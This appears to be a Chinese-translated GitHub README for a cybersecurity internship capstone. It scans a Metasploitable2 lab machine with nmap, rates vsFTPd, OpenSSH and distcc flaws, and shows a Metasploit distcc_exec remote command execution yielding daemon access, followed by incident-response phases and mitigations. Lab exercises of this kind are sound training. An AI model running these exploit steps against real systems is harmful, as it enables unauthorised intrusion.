raghu683/Apexplanet-Task-5-Capstone-Project-Incident-Response

# Apexplanet-Task-5-Capstone-Project-事件响应 # 任务 5 – 毕业设计项目与事件响应 ## 网络安全实习 ### 目标 本次毕业设计项目的目标是对存在漏洞的 Linux 机器（Metasploitable2）进行全面的漏洞评估，识别安全弱点，在受控环境中进行道德漏洞利用演示，并模拟事件响应流程。 ## 实验环境 **攻击机** - Kali Linux - IP 地址：192.168.56.101 **目标机** - Metasploitable2 - IP 地址：192.168.56.102 **网络** VirtualBox Host-Only Network ## 使用的工具 - Kali Linux - Nmap - Metasploit Framework - VirtualBox - Linux 终端 ## 网络扫描 命令： ``` nmap -sV -p 21,22,3632 192.168.56.102 ``` 发现的服务 | 端口 | 服务 | 版本 | |------|----------|----------| |21|FTP|vsFTPd 2.3.4| |22|SSH|OpenSSH 4.7p1| |3632|DistCC|distccd v1| ## 漏洞评估 ### FTP (端口 21) - 软件：vsFTPd 2.3.4 - 风险：高 ### SSH (端口 22) - 软件：OpenSSH 4.7p1 - 风险：中 ### DistCC (端口 3632) - 风险：严重 DistCC 服务存在远程命令执行漏洞。 ## 漏洞利用 Metasploit 模块 ``` exploit/unix/misc/distcc_exec ``` Payload ``` cmd/unix/generic ``` 执行的命令 ``` id ``` 输出 ``` uid=1(daemon) gid=1(daemon) groups=1(daemon) ``` 这证实了远程命令执行成功。 ## 事件响应 模拟了以下阶段： - 检测 - 分析 - 遏制 - 根除 - 恢复 - 经验教训 ## 风险评估 | 漏洞 | 风险 | |--------------|------| |DistCC|严重| |vsFTPd|高| |OpenSSH|中| ## 缓解措施 - 禁用不必要的服务 - 应用安全补丁 - 限制网络访问 - 使用强身份验证 - 启用持续监控 ## 项目文件 - 任务 5 报告 - Nmap 扫描结果 - 事件响应报告 - 发现报告 - 网络拓扑图 - 截图 ## 学习成果 - 网络扫描 - 服务枚举 - 漏洞评估 - 道德漏洞利用 - 事件响应 - 风险评估 - 网络安全文档 ## 作者 **ANKALA VENKATA RAGHU** 网络安全实习

标签：AES-256, CTI, Nmap, XXE攻击, 库, 应急响应, 插件系统, 漏洞评估, 网络安全, 虚拟驱动器, 隐私保护